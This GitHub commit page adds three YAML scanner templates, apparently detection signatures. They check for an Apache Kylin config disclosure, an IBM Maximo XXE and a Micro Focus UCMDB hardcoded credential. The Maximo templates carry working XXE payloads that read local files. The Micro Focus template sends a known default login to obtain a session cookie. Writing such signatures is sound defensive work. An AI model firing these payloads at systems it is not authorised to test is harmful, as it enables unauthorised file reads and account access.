Skip to content

Commit

Permalink
Update some new cves
Browse files Browse the repository at this point in the history
  • Loading branch information
j3ssie committed Dec 21, 2020
1 parent 9760f75 commit 409c9db
Show file tree
Hide file tree
Showing 3 changed files with 108 additions and 0 deletions.
21 changes: 21 additions & 0 deletions cves/apache-kylin-config-disclosure-cve-2020-13937.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
id: apache-kylin-config-disclosure-cve-2020-13937
info:
name: Apache Kylin config disclosure (CVE-2020-13937)
risk: High

params:
- root: "{{.BaseURL}}"

requests:
- method: GET
redirect: false
url: >-
{{.root}}/kylin/api/admin/config
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
StatusCode() == 200 && StringSearch('body', 'kylin.env') && StringSearch('resHeaders', 'application/json') && StringSearch('body', 'kylin.server')
reference:
- link: https://starlabs.sg/advisories/20-13937/
63 changes: 63 additions & 0 deletions cves/ibm-maximo-xxe-cve-2020-4463.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
id: ibm-maximo-xxe-cve-2020-4463
info:
name: IBM Maximo Asset Management XXE (CVE-2020-4463)
risk: High

params:
- root: "{{.BaseURL}}"

replicate:
prefixes: 'maximo'

requests:
- method: POST
redirect: false
url: >-
{{.root}}/meaweb/os/mxperson
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Content-Type: application/xml
body: |
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///">
]>
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
<max:MXPERSONQuery>
<max:PERSON>
<max:PERSONUID>&xxe;</max:PERSONUID>
</max:PERSON>
</max:MXPERSONQuery>
</max:QueryMXPERSON>
detections:
- >-
StatusCode() == 500 && StringSearch('response', 'Error 500: For input string') && StringSearch('response', 'bin')
- method: POST
redirect: false
url: >-
{{.root}}/meaweb/os/mxperson
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Content-Type: application/xml
body: |
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///c:/">
]>
<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
<max:MXPERSONQuery>
<max:PERSON>
<max:PERSONUID>&xxe;</max:PERSONUID>
</max:PERSON>
</max:MXPERSONQuery>
</max:QueryMXPERSON>
detections:
- >-
StatusCode() == 500 && StringSearch('response', 'Error 500: For input string') && StringSearch('response', 'Windows')
references:
- reference: https://github.com/Ibonok/CVE-2020-4463
24 changes: 24 additions & 0 deletions cves/micro-focus-hardcode-cred-cve-2020-11854.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
id: micro-focus-hardcode-cred-cve-2020-11854
info:
name: Micro Focus HardCode Credential (CVE-2020-11854)
risk: High

params:
- root: "{{.BaseURL}}"

replicate:
ports: '8443'

requests:
- method: POST
redirect: false
url: >-
{{.root}}/ucmdb-ui/cms/loginRequest.do;?customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && StringSearch("resHeaders", "LWSSO_COOKIE_KEY")
references:
- link: https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md

0 comments on commit 409c9db

Please sign in to comment.